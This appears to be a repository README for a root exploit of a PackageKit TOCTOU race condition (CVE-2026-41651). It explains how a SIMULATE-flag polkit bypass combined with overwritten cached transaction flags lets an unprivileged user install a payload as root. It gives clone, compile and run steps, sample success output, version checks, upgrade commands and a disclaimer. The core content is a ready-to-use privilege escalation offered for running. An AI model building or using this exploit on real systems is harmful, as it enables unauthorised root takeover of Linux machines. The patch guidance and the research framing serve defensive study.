Local Privilege Escalation exploit targeting the PackageKit daemon.
Escalates from an unprivileged local user torootthrough a TOCTOU race condition vulnerability.
CVE-2026-41651 (also known as Pack2TheRoot) is a critical TOCTOU (Time-Of-Check to Time-Of-Use) race condition vulnerability in PackageKit, a system service used by many Linux distributions for package management abstraction.
The vulnerability allows a local unprivileged user to manipulate PackageKit transaction states and bypass authorization checks under specific conditions.
An attacker with local access may be able to:
- Install arbitrary packages with elevated privileges
- Execute package maintainer scripts as
root - Achieve full local privilege escalation
- Bypass expected
polkitauthorization behavior
| Component | Vulnerable Versions | Fixed Version |
|---|---|---|
| PackageKit | 1.0.2 – 1.3.4 |
1.3.5 |
- Ubuntu 24.04 (Noble Numbat)
- Ubuntu 22.04 (Jammy Jellyfish)
- Debian 12 (Bookworm)
- Kali Linux (latest)
- Other Debian/Ubuntu-based distributions using vulnerable PackageKit versions
The issue originates from multiple logic flaws inside src/pk-transaction.c.
| Bug | Location | Description |
|---|---|---|
| BUG 1 | Line 4036 | InstallFiles() overwrites cached transaction flags and paths without proper state validation |
| BUG 2 | Lines 876–881 | pk_transaction_set_state() silently rejects backward state transitions |
| BUG 3 | Lines 2273–2277 | pk_transaction_run() reads cached flags during dispatch rather than authorization |
| BYPASS | Lines 2893–2900 | SIMULATE flag (0x4) skips polkit authorization checks |
Attacker (unprivileged) packagekitd (root)
│ │
├── 1. InstallFiles(SIMULATE) ───────► │ polkit bypassed → state = READY
│ │ queued async dispatch
│
├── 2. InstallFiles(payload) ─────────► │ cached flags overwritten
│ │ invalid state transition ignored
│
│ [dispatch occurs] │
│ │ payload processed as root
│ │ maintainer scripts executed
│
└────────────────────────────────────► │ privilege escalation achieved
Install required development libraries:
sudo apt update
sudo apt install libglib2.0-devgit clone https://github.com/Lutfifakee-Project/CVE-2026-41651.git
cd CVE-2026-41651gcc -o exploit CVE-2026-41651.c \
`pkg-config --cflags --libs glib-2.0 gio-2.0` \
-WallRun as an unprivileged user.
./exploit ______ ______ ___ ___ ___ ____ ___________ _______
/ ___/ | / / __/___|_ |/ _ \|_ |/ __/____/ / < / __// __< /
/ /__ | |/ / _//___/ __// // / __// _ \/___/_ _/ / _ \/__ \/ /
\___/ |___/___/ /____/\___/____/\___/ /_//_/\___/____/_/
CVE-2026-41651 - PackageKit TOCTOU Local Privilege Escalation
═══════════════════════════════════════════════════════════════════
[*] Building packages...
[*] Starting race condition...
[*] Waiting for dispatch...
[*] Polling for payload...
[+] SUCCESS — privilege escalation completed
pkcon --versionOr:
dpkg -l | grep packagekit- Vulnerable →
1.0.2–1.3.4 - Patched →
1.3.5or later
sudo apt update
sudo apt upgrade packagekitOfficial releases:
This repository is provided strictly for:
- Security research
- Defensive security testing
- Educational purposes
- Authorized penetration testing
The author is not responsible for any misuse, illegal activity, or damage caused by this project.
Do not use this software against systems you do not own or have explicit permission to test.